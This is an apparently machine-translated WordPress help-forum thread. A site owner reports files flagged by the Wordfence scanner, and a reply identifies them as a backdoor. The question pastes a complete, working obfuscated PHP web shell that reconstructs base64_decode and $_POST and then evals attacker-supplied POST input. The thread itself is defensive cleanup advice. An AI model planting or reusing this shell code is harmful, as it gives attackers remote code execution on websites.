Wordpress漏洞警报

Question

我刚刚运行插件Wordfence，它给了我一些问题需要解决。

有两组相同的suspucious代码：

File appears to be malicious: wp-admin/cache/alias90.php 
File appears to be malicious: wp-content/languages/plugins/title.php 
File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/lib.php 
File appears to be malicious: wp-includes/js/tinymce/utils/blog.php 
File appears to be malicious: wp-content/uploads/2013/start24.php 

描述说：该文件似乎被黑客安装进行恶意活动。如果你知道这个文件，你可以选择忽略它来排除它在未来的扫描。我们在该文件中发现的与已知恶意文件相匹配的文本是：“@ $ GLOBALS [$ GLOBALS ['y23c'] [67]。$ GLOBALS ['y23c'] [76]。$ GLOBALS ['y23c'] [ 76]”。

和第二组：

File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/gallery.php.suspected 
File appears to be malicious: wp-content/themes/themename/languages/dump.php.suspected 
File appears to be malicious: wp-content/uploads/2013/05/help.php.suspected 
File appears to be malicious: wp-content/uploads/2014/04/model.php.suspected 
File appears to be malicious: wp-content/uploads/2015/06/blog.php.suspected 

当描述是：该文件似乎被黑客安装以执行恶意活动。如果你知道这个文件，你可以选择忽略它来排除它在未来的扫描。我们在这个文件中匹配一个已知的恶意文件中的文字是：“用strtolower（$ SF 6 4] $ SF 6 5] $ SF 6 9]。”

我应该用这些文件做是？ ？他们居然恶意软件

编辑：从第二组中的文件有这样的代码

<?php 
$sF="PCT4BA6ODSE_"; 
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]); 
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]); 
if (isset(${$s20}['n726b60'])) { 
    eval($s21(${$s20}['n726b60'])); 
} 
?> 

EDIT2：我评估了代码和返回这一点：？

base64_decode($_POST['n726b60']); 

这是危险的东西

Answer 1

这是一个用来在服务器上运行恶意代码的shell。他们通常通过在线机器人上传到您的服务器，扫描网站的易受攻击的WordPress插件。实质上，shell代码允许它们通过使用eval函数基于输入$_POST变量来运行代码。

我在一个客户端wordpress网站上发现了这种情况，他们有大量不必要的插件应该被禁用+删除。

我会认真考虑通过谷歌检查你所有的wordpress插件，看看你是否可以找到任何公开发布的漏洞。另外，请尝试浏览所有目录并删除类似这些文件。